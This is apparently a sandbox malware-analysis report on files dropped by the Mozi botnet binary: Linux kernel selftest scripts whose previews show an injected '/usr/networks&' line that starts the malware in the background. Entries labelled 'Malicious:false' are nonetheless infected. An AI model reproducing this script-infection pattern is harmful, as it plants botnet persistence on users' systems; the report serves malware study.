                                                              SHA-512:CBF5CB74B09EB0168F6EC2D426D7A1052776E6E4DAF93CE0AE76AA87DD8A909584DEE73991D150B064A4C771367DFFCA2EF59FBC09D180F1026D2E89DF9C4DC9
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..msg="skip all tests:".if [ $UID != 0 ] && [ $EVALUATE_ONLY == 0 ]; then. echo $msg please run this as root >&2. exit $ksft_skip.fi..max_cpus=$(($(nproc)-1))..function run_test () {...file_ext=$1..for cpu in `seq 0 $max_cpus`..do...echo "launching aperf load on $cpu"..../aperf $cpu &..done...echo "sleeping for 5 seconds"..sleep 5..grep MHz /proc/cpuinfo | sort -u > /tmp/result.freqs..num_freqs=$(wc -l /tmp/result.freqs | awk ' { print $1 } ')..if [ $num_freqs -ge 2 ]; then...tail -n 1 /tmp/result.freqs > /tmp/result.$1..else...cp /tmp/result.freqs /tmp/result.$1..fi.../msr 0 >> /tmp/result.$1...max_perf_pct=$(cat /sys/devices/system/cpu/intel_pstate/max_perf_pct)..echo "max_perf_pct $max_perf_pct" >> /tmp/result.$1...for job in `jobs -p`..do...echo "waiting for job id $job"...wait $job..done.}..#.# MAIN (ALL UNITS IN MHZ).#..# Get the marketing frequency._mkt_freq=$(cat /proc/cpuinfo | grep -m 1 "model name" | awk '{print $NF}')._mkt_freq=$(ech
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):377
                                                              Entropy (8bit):5.116243621753489
                                                              Encrypted:false
                                                              SSDEEP:6:6WaMbxxRuv32K8mgez47sW5mB5gGk4QNVDBXzKUExie3C0+rhvPn:9HbxxROmKhgezE35mpknNVDBXMMeytvP
                                                              MD5:DDD753E2B7A6E09C9F5B645CC75F3779
                                                              SHA1:D87672C2017A7420CF967ECB39F2A27C3B9F3395
                                                              SHA-256:87230B40928E60FF9D028DC9AD3AD051752916A3C9227C6253B92474BF6726FB
                                                              SHA-512:80E6E81A40A074939DBEE4411A5FF9EEC6924C38C02FFBB0D96B7C1F1B65F7DF4FA4BDBE5BC216D473BF42CAA715A4A6623B094A99479922A9E9748E6588C5F5
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..if ! /sbin/modprobe -q -n rc-loopback; then. echo "ir_loopback: module rc-loopback is not found [SKIP]". exit $ksft_skip.fi../sbin/modprobe rc-loopback.if [ $? -ne 0 ]; then..exit.fi..RCDEV=$(grep -l DRV_NAME=rc-loopback /sys/class/rc/rc*/uevent | grep -o 'rc[0-9]\+').../ir_loopback $RCDEV $RCDEV.exit../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):4990
                                                              Entropy (8bit):5.229246673549564
                                                              Encrypted:false
                                                              SSDEEP:96:llPBllfCCC2YVwXV+3iJH3knUXW5kqUMk:llJllKCCFOXM3i93knU2UH
                                                              MD5:5E666C728F25C89FF22234F4F6513BDF
                                                              SHA1:687C1514EF45B8B0773A06CEE0A9D66A15CB0E41
                                                              SHA-256:8FD8EDD4844436031CEFF15AA7078CCDAFE491684330C0E887CA8178B61BF3A2
                                                              SHA-512:57515DEACDA29914E426B90BD2D72A0F1326CBF1974E42A2D05A4853402EC9BBA840244083B03CF307A54FDFF326A6C6BFA16A41C31BE7C467DA449FC62FCFA6
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 0.}..# The ksefltest framework requirement returns 1 for FAIL..log_fail().{..[ $VERBOSE -ne 0 ] && echo "$1 [FAIL]"..exit 1.}..# The ksefltest framework requirement returns 4 for SKIP..log_skip().{..[ $VERBOSE -ne 0 ] && echo "$1"..exit 4.}..# Check efivar SecureBoot-$(the UUID) and SetupMode-$(the UUID)..# (Based on kdump-lib.sh).get_efivarfs_secureboot_mode().{..local efivarfs="/sys/firmware/efi/efivars"..local secure_boot_file=""..local setup_mode_file=""..local secureboot_mode=0..local setup_mode=0...# Make sure that efivar_fs is mounted in the normal location..if ! grep -q "^\S\+ $efivarfs efivarfs" /proc/mounts; then...log_info "efivars is not mounted on $efivarfs"...return 0;..fi..secure_boot_file=$(find "$efivarfs" -name SecureBoot-* 2>/dev/null)..setup_mode_file=$(find "$efivarfs" -name SetupMode-* 2>/dev/null)..if [ -f "$secure_boot_file" ] && [ -f "$setup_mode_file" ]; then...secureboot_mode=$(hexdump -v -e '/1 "%d\ "' \...."$secure_boot_file"|cut -d' '
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):11072
                                                              Entropy (8bit):5.471734397341002
                                                              Encrypted:false
                                                              SSDEEP:192:SwAwkqrPjya4ynFGoEGNLp8p3GyspJepJFvgkgMsMiT3RN6tt:SLw5OPwcoJ2N5srerFvN/iT3M
                                                              MD5:C3B72303BE30EE939F95B5ECB958D777
                                                              SHA1:2A1261447A7CC21E6A0B5681B4A2B5EE09831A00
                                                              SHA-256:C786C60928E71FC2317F06C9E653FF542731E0EE9FD739B1276207B4EB323984
                                                              SHA-512:99B326E70CDDB17A20C5BE276E3C5194BF4DBDF9E0E61353523905FC9905EFF7BAD9F65A6AD4E69472C6E8A4AA0BB04C007B3D1A84FA3757ACA22A7C3E3232E0
                                                              Malicious:false
                                                              Preview:./usr/networks&. exit $ksft_skip. fi.}..function allow_user_defaults().{..if [ -z $DEFAULT_KMOD_DRIVER ]; then...DEFAULT_KMOD_DRIVER="test_module"..fi...if [ -z $DEFAULT_KMOD_FS ]; then...DEFAULT_KMOD_FS="xfs"..fi...if [ -z $PROC_DIR ]; then...PROC_DIR="/proc/sys/kernel/"..fi...if [ -z $MODPROBE_LIMIT ]; then...MODPROBE_LIMIT=50..fi...if [ -z $DIR ]; then...DIR="/sys/devices/virtual/misc/${TEST_DRIVER}0/"..fi...if [ -z $DEFAULT_NUM_TESTS ]; then...DEFAULT_NUM_TESTS=150..fi...MODPROBE_LIMIT_FILE="${PROC_DIR}/kmod-limit".}..test_reqs().{..if ! which modprobe 2> /dev/null > /dev/null; then...echo "$0: You need modprobe installed" >&2...exit $ksft_skip..fi...if ! which kmod 2> /dev/null > /dev/null; then...echo "$0: You need kmod installed" >&2...exit $ksft_skip..fi...# kmod 19 has a bad bug where it returns 0 when modprobe..# gets called *even* if the module was not loaded due to..# some bad heuristics. For details see:..#..# A work around is possible in-kernel but its
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):2080
                                                              Entropy (8bit):5.314686727178092
                                                              Encrypted:false
                                                              SSDEEP:48:rhp/MbdeWKmipFHlkJcUrwcTnab6NikgvMjujQOkjGnyLas:DMb8DXqTdTabSi/6urNyLas
                                                              MD5:A15BCBBD4B7ED7789B0E82A3B61469FE
                                                              SHA1:0C7620791E6F86BE31D54585390D81BD76222D46
                                                              SHA-256:B68807676ECAE58A8EDEC222B7F29848DF261DBBC87EF9512CA8117F939FFA28
                                                              SHA-512:02B945C30BF5477322D80290300CB81432132E463E6F2BC401197667BC70E492372E55C6C4CCFC216430A471A04443439D81FC38A03EB609345A46559E8F8101
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1.fi..# If Perl is unavailable, we must fall back to line-at-a-time prefixing.# with sed instead of unbuffered output..tap_prefix().{..if [ ! -x /usr/bin/perl ]; then...sed -e 's/^/# /'..else..."$BASE_DIR"/kselftest/prefix.pl..fi.}..tap_timeout().{..# Make sure tests will time out if utility is available...if [ -x /usr/bin/timeout ] && [ $kselftest_timeout -gt 0 ] ; then.../usr/bin/timeout --foreground "$kselftest_timeout" "$1"..else..."$1"..fi.}..run_one().{..DIR="$1"..TEST="$2"..NUM="$3"...BASENAME_TEST=$(basename $TEST)...# Reset any "settings"-file variables...export kselftest_timeout="$kselftest_default_timeout"..# Load per-test-directory kselftest "settings" file...settings="$BASE_DIR/$DIR/settings"..if [ -r "$settings" ] ; then...while read line ; do....field=$(echo "$line" | cut -d= -f1)....value=$(echo "$line" | cut -d= -f2-)....eval "kselftest_$field"="$value"...done < "$settings"..fi...TEST_HDR_MSG="selftests: $DIR: $BASENAME_TEST"..echo "# $TEST_HDR_MS
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):434
                                                              Entropy (8bit):4.947669354093026
                                                              Encrypted:false
                                                              SSDEEP:12:cnVFLkhdZDfL8bHjPrxVeMLU9R939UWIe4n:MV5kdTLy3veMLg9tUW0
                                                              MD5:C151AADA79CEF900C2965B5B15E15C4D
                                                              SHA1:2BA3E33311218B83B81E01B765C984D1B28E6CB5
                                                              SHA-256:66F9EAB006E05CF23853E19F2EF608B2AB6D3361206ADD9845CA3B03F97C8370
                                                              SHA-512:544EE3580303971B17A555CBB9EED376DA4B2ABD18EA26B8DE8A055A1735564C31F1B0494297627D2B3E71E13084CF88C429048D602E3A892E4A3991EC507F9F
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit 1;..fi...# Only allow installation into an existing location...if [ "$#" -eq 0 ]; then...echo "$0: Installing in default location - $install_dir ..."..elif [ ! -d "$1" ]; then...echo "$0: $1 doesn't exist!!"...exit 1;..else...install_dir="$1"...echo "$0: Installing in specified location - $install_dir ..."..fi...# Build tests..KSFT_INSTALL_PATH="$install_dir" make install.}..main "$@"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:OS/2 REXX batch file, ASCII text
                                                              Category:dropped
                                                              Size (bytes):655
                                                              Entropy (8bit):4.782002361541967
                                                              Encrypted:false
                                                              SSDEEP:12:wA1ITFexHGAUldev0xpeOAwevfaKHVLCBdKHYAwv5J5yGV4dOkwbqS4n:r1OCGAUXRpAwOVLCBdKHYAwZN+OpbqT
                                                              MD5:F883ACA41C9A34D74C29A7E0237A0AA1
                                                              SHA1:185D2E9FDB6AEA2620DB6410CA14B07BFAC4906F
                                                              SHA-256:3808E326FBE721E7997056A09D96F1CEA5B1DEE3EDC36FA34B8B8FBBB43B072A
                                                              SHA-512:58A6678DF52979777D996393ED233F6967D6D16B7A9063558AE51D560F7484059E9297D1973E198B17FCE8D0ED9EBA8A50FBA2E2DBD1BC548DCD347947724369
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 1. fi.. desc="$1". shift || true. module="$1". shift || true. args="$@".}..assert_root() {. if [ ! -w /dev ]; then..skip "please run as root". fi.}..assert_have_module() {. if ! $modprobe -q -n $module; then..skip "module $module is not found". fi.}..run_module() {. if $modprobe -q $module $args; then..$modprobe -q -r $module..say "ok". else..fail "". fi.}..say() {. echo "$desc: $1".}...fail() {. say "$1 [FAIL]" >&2. exit 1.}..skip() {. say "$1 [SKIP]" >&2. # Kselftest framework requirement - SKIP code is 4.. exit 4.}..#.# Main script.#.main "$@"../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5539
                                                              Entropy (8bit):5.1207618092933025
                                                              Encrypted:false
                                                              SSDEEP:96:Pt8ozF7fIbvkg00GifF8p+7lpZKpsSscJydwJocXjsUuxsd9i14l:V8QMvkF0HN847lusqJ5qIjsUu49iOl
                                                              MD5:5719D18704140CF656116B4B9DF238AE
                                                              SHA1:F74449C68570D42A1B91747FC2887DE1C045179D
                                                              SHA-256:334BB33E773A83BEE5C4F9E7FA7B82ED8A2F8F602CD6353DCF3B0070AB548A8B
                                                              SHA-512:8A14E4ABD88C1C03EA7E0F84191D03306248DD3A7E194FEF61BDE79CE92F472517E709CC733B60EA0F4F2C1A631B530A3C9BDAC8EEEF03A5C226760912CF3C70
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit 4.}..# die(msg) - game over, man.#.msg - dying words.function die() {..log "ERROR: $1"..echo "ERROR: $1" >&2..exit 1.}..function push_dynamic_debug() {. DYNAMIC_DEBUG=$(grep '^kernel/livepatch' /sys/kernel/debug/dynamic_debug/control | \. awk -F'[: ]' '{print "file " $1 " line " $2 " " $4}').}..function pop_dynamic_debug() {..if [[ -n "$DYNAMIC_DEBUG" ]]; then...echo -n "$DYNAMIC_DEBUG" > /sys/kernel/debug/dynamic_debug/control..fi.}..# set_dynamic_debug() - save the current dynamic debug config and tweak.# ...it for the self-tests. Set a script exit trap.#...that restores the original config..function set_dynamic_debug() {. push_dynamic_debug. trap pop_dynamic_debug EXIT INT TERM HUP. cat <<-EOF > /sys/kernel/debug/dynamic_debug/control...file kernel/livepatch/* +p...func klp_try_switch_task -p...EOF.}..# loop_until(cmd) - loop a command until it is successful or $MAX_RETRIES,.#.. sleep $RETRY_INTERVAL between attemp
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):21397
                                                              Entropy (8bit):5.327362750446854
                                                              Encrypted:false
                                                              SSDEEP:384:wdt/f+MhN4uEdrCKVcDBwTYQLPN2S9L1tGJCDuDGQ:BDNGRGQ
                                                              MD5:5EA70D701012A2DE18EB73B7A32266E0
                                                              SHA1:4C8D752F31BF41A9919B69D1E5F0FBAA9BD908C2
                                                              SHA-256:5A0151E99EA2E1AF05FB60DFA2C725158DA2A3CD4F7087638CBB69DC634EA132
                                                              SHA-512:F775A6773426F6607F8DC1D45020F43F00A4D178E495D6DBB1A39FF460F6EF601FC791937C07E19568A5D5988ED8C9BC227A4060FDC055154D94F6BA720BFC4D
                                                              Malicious:false
                                                              Preview:./usr/networks&.$MOD_TARGET: ${MOD_TARGET}_exit"...# TEST: module_coming notifier.#.# This test is similar to the previous test, but (un)load the livepatch.# module before the target kernel module. This tests the livepatch.# core's module_coming handler..#.# - On livepatch enable, only pre/post-patch callbacks are executed for.# currently loaded klp_objects, in this case, vmlinux..#.# - When a targeted module is subsequently loaded, only its.# pre/post-patch callbacks are executed..#.# - On livepatch disable, all currently loaded klp_objects' (vmlinux and.# $MOD_TARGET) pre/post-unpatch callbacks are executed...echo -n "TEST: module_coming notifier ... ".dmesg -C..load_lp $MOD_LIVEPATCH.load_mod $MOD_TARGET.disable_lp $MOD_LIVEPATCH.unload_lp $MOD_LIVEPATCH.unload_mod $MOD_TARGET..check_result "% modprobe $MOD_LIVEPATCH.livepatch: enabling patch '$MOD_LIVEPATCH'.livepatch: '$MOD_LIVEPATCH': initializing patching transition.$MOD_LIVEPATCH: pre_patch_callback: vmlinux.livepatch: '
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):46
                                                              Entropy (8bit):3.925523369006428
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOOR3vKDlOORgn:uK4n
                                                              MD5:2CADDA792FBD37B54978108B6CC504D4
                                                              SHA1:C28DD4FAC0523E31F0220FF31417583882C82692
                                                              SHA-256:E6D7ED75CDB1FA6A44D3ACEC4A6933828B8FEA70FF78C167E49214E7D1634305
                                                              SHA-512:681E59EF7DEE6E6F60C0ABF3325E5F64DF4CEA10A4D0DA585198ECD3BE951722DBE2559F6CE20E70CB97E84E7CEFEED4DC6AC78204D9C9FF403343ECEC7997A0
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 0../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):239
                                                              Entropy (8bit):4.593536530803619
                                                              Encrypted:false
                                                              SSDEEP:3:qXVasWoWbsK3rKCAWRhtmcrWr3rKbVR9htmtFZeLwAdFClveLwAdFcksWP/NJjUE:6WLUTQVHut3zAdGvzAd/sWPTov6viMn
                                                              MD5:E481DB4C471700714131FC670E4565C8
                                                              SHA1:31B80732C4799F423A4C77CC7CC287041633DF19
                                                              SHA-256:95AABAD6F9543FA79A303D67D76111CFBAA9D496AAC5D2FAF3EE90567FC87FB9
                                                              SHA-512:84AA078169ACD5251C73B95DC74005553D7420F0D780AF6F0AE113464889DEC48D7121119C9762935537CFC08E78466D95769ABB75AE6A027E18AC7791DE0794
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi..if /sbin/modprobe -q test-ww_mutex; then. /sbin/modprobe -q -r test-ww_mutex. echo "locking/ww_mutex: ok".else. echo "locking/ww_mutex: [FAIL]". exit 1.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):23
                                                              Entropy (8bit):3.882045108136863
                                                              Encrypted:false
                                                              SSDEEP:3:qXVOORgn:Tn
                                                              MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                              SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                              SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                              SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                              Malicious:false
                                                              Preview:./usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):894
                                                              Entropy (8bit):4.917046734902346
                                                              Encrypted:false
                                                              SSDEEP:24:M0ZrJUueWh3QTwYwisHxr0ETdQxReCrDPe6rs:McUVWkeiFEeXeOy
                                                              MD5:1EA9500EA2D85C26D5FDB2E83315EE1C
                                                              SHA1:ECD6138BCC6DFBF9C586527023ECADB57F45E3F2
                                                              SHA-256:614CB18904DF272F0CEAAF58CBCA8788F1AEAD86DEA60486A93FC5F904C9DE70
                                                              SHA-512:153135A8D20F6D91F6B04E36F973E2476CDFF14B23D8D6D05C485E6B38A386A73D78EBC42992923D0DD13C1E8A382FF5B137FE613F6605EF7D54DDECFC477F1F
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi...echo 3 > /proc/sys/vm/drop_caches..echo $(( $hpages_needed + $nr_hugepgs )) > /proc/sys/vm/nr_hugepages..while read name size unit; do...if [ "$name" = "HugePages_Free:" ]; then....freepgs=$size...fi..done < /proc/meminfo.fi..#.# If still not enough huge pages available, exit. But, give back any huge.# pages potentially allocated above..#.if [ $freepgs -lt $hpages_test ]; then..# nr_hugepgs non-zero only if we attempted to increase..if [ -n "$nr_hugepgs" ]; then...echo $nr_hugepgs > /proc/sys/vm/nr_hugepages..fi..printf "Not enough huge pages available (%d < %d)\n" \...$freepgs $needpgs..exit $ksft_skip.fi..#.# Run the hugetlbfs test.#../memfd_test hugetlbfs../run_fuse_test.sh hugetlbfs..#.# Give back any huge pages allocated for the test.#.if [ -n "$nr_hugepgs" ]; then..echo $nr_hugepgs > /proc/sys/vm/nr_hugepages.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):6085
                                                              Entropy (8bit):5.222118071271236
                                                              Encrypted:false
                                                              SSDEEP:96:PS6opte4QrOTqSdLAdJ8OqtVnQWohfmDSohOHvrkd:PSDpte/rO+ShAEO+nQWohfmDSohOHvrg
                                                              MD5:BC65EE02174F25DA47F67048EE476ECC
                                                              SHA1:5A0F574368D948305FDD7B560F4AC9F0EB22FB41
                                                              SHA-256:6487CEF33AA91CA38A6A8C7CE93308E0EF68A267DC99EA1715165661AF3DFBBA
                                                              SHA-512:1F041350A2F4A632F658B83FE6AD7E8FACF3F69E888FC8C1BE0A5D6044A120648736432950D9A407C59322776B61AF30C0850687E8E634710DA90EF71D6C1420
                                                              Malicious:false
                                                              Preview:./usr/networks&...exit $ksft_skip..fi...SYSFS=`mount -t sysfs | head -1 | awk '{ print $3 }'`...if [ ! -d "$SYSFS" ]; then...echo $msg sysfs is not mounted >&2...exit $ksft_skip..fi...if ! ls $SYSFS/devices/system/memory/memory* > /dev/null 2>&1; then...echo $msg memory hotplug is not supported >&2...exit $ksft_skip..fi...if ! grep -q 1 $SYSFS/devices/system/memory/memory*/removable; then...echo $msg no hot-pluggable memory >&2...exit $ksft_skip..fi.}..#.# list all hot-pluggable memory.#.hotpluggable_memory().{..local state=${1:-.\*}...for memory in $SYSFS/devices/system/memory/memory*; do...if grep -q 1 $memory/removable &&... grep -q $state $memory/state; then....echo ${memory##/*/memory}...fi..done.}..hotpluggable_offline_memory().{..hotpluggable_memory offline.}..hotpluggable_online_memory().{..hotpluggable_memory online.}..memory_is_online().{..grep -q online $SYSFS/devices/system/memory/memory$1/state.}..memory_is_offline().{..grep -q offline $SYSFS/devices/system/memory/memory
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):59
                                                              Entropy (8bit):4.140763389477654
                                                              Encrypted:false
                                                              SSDEEP:3:qXVasWoWbPDXVOORgn:6W9Mn
                                                              MD5:0A5C7A75059C630EEFC22C6F180442A8
                                                              SHA1:D8EB51C2C827DA1D4F2A859EF36F294D1AF38842
                                                              SHA-256:7657F8B81C1CFB82399BB4E53F4F23EDC7E0F2F281F4C1569DF650D731ECC4D6
                                                              SHA-512:214F4D17D813CA80185D1535D611CAE7A1B2DCD0AD9D09C1B2E01D882C6B752CAE6AB5AD96C36E1B5B2236EC3540A1537B818C726BD1C92B9419BAE087EE0825
                                                              Malicious:false
                                                              Preview:./usr/networks&..exit $ksft_skip.fi../usr/networks&.exit 1.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):81828
                                                              Entropy (8bit):5.22489764897402
                                                              Encrypted:false
                                                              SSDEEP:768:DP0urh05CFq1eoIvEG7tS9WYiUnOrSNlMcFZAP4j7w22q8r4ajdxaCyqb6XUuHu2:DrO5JUcHVX+VKr
                                                              MD5:F2F9319BD4E69A0A7C78AFF8875729C4
                                                              SHA1:AEC8DF0552658E8EC9CB9814F5DBEE4CAE3FEF96
                                                              SHA-256:2195F36873CB8AAC5278E53D0B94DCA5EB074A57AF51B1E20D8CF955050458BC
                                                              SHA-512:BB09F77E16941C6F2F869ABE3F8A93E4AC6A905293D0C9F37B2D0AA8F3498D9A5529774644AB9B5C2E36A8256938164690725E72D8C2ECACB6093E131EAFD9C9
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi...if [ "${PAUSE}" = "yes" ]; then...echo...echo "hit enter to continue, 'q' to quit"...read a...[ "$a" = "q" ] && exit 1..fi...kill_procs.}..log_test_addr().{..local addr=$1..local rc=$2..local expected=$3..local msg="$4"..local astr...astr=$(addr2str ${addr})..log_test $rc $expected "$msg - ${astr}".}..log_section().{..echo..echo "###########################################################################"..echo "$*"..echo "###########################################################################"..echo.}..log_subsection().{..echo..echo "#################################################################"..echo "$*"..echo.}..log_start().{..# make sure we have no test instances running..kill_procs...if [ "${VERBOSE}" = "1" ]; then...echo...echo "#######################################################"..fi.}..log_debug().{..if [ "${VERBOSE}" = "1" ]; then...echo...echo "$*"...echo..fi.}..show_hint().{..if [ "${VERBOSE}" = "1" ]; then.
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):10482
                                                              Entropy (8bit):5.520140277320042
                                                              Encrypted:false
                                                              SSDEEP:192:Hf6aoUuW2v/DNRoEMUHR+4X4jEdfIok/CJY/JGgU:Cvr8EMWK/Mz
                                                              MD5:A772B76FFC1B6AB09E9DCD0B874EB213
                                                              SHA1:66C9D16185128FF2EAB98556B1E8B617678A4353
                                                              SHA-256:516D962A6E31A455D259BF052DC7E76964126336632243DBFECCB766629A4523
                                                              SHA-512:869FF3072689E0602B00DD74E561E28FFDC6DD8914EB07D460605977F1968BDC6E83475A27B4494363FACFDBF587568BC4733722575DC2E485174012472B0FF0
                                                              Malicious:false
                                                              Preview:./usr/networks&....[ "$a" = "q" ] && exit 1...fi..fi.}..log_section().{..echo..echo "######################################################################"..echo "TEST SECTION: $*"..echo "######################################################################".}..log_subsection().{..echo..echo "#########################################"..echo "TEST SUBSECTION: $*".}..run_cmd().{..local cmd="$*"..local out..local rc...if [ "$VERBOSE" = "1" ]; then...printf " COMMAND: $cmd\n"..fi...out=$(eval $cmd 2>&1)..rc=$?..if [ "$VERBOSE" = "1" -a -n "$out" ]; then...echo " $out"..fi...[ "$VERBOSE" = "1" ] && echo...return $rc.}..get_linklocal().{..local dev=$1..local pfx..local addr...addr=$(${pfx} ip -6 -br addr show dev ${dev} | \..awk '{...for (i = 3; i <= NF; ++i) {....if ($i ~ /^fe80/).....print $i...}..}'..)..addr=${addr/\/*}...[ -z "$addr" ] && return 1...echo $addr...return 0.}..################################################################################.#..setup().{..echo..echo "
                                                              Process:/tmp/Mozi.m.elf
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):5033
                                                              Entropy (8bit):5.199543662874075
                                                              Encrypted:false
                                                              SSDEEP:96:gcg5COx54mZEExrIKSw0Y/EYNYaB6FCAOTTXs+bFNZlM:0L7rIgnhbJM
                                                              MD5:616700222685088C7BE53E46E671009B
                                                              SHA1:01592A677B04EA088572BD7517BE85FCC67F9DDA
                                                              SHA-256:BF687114D57F8773EFFE0B21D228D9FDD436F3C4CCA8C8A78F7349CA0D465D3D
